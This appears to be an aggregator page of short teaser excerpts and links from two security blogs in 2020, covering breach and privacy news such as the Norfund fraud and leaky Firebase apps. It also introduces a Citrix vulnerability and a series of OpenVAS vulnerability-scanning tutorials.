http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of m in cyber-attack
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The Norwegian Investment Fund has been swindled out of m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […]
The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […]
The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber-attacks hit hospital construction companies
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: BBC Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...]
The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]
The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)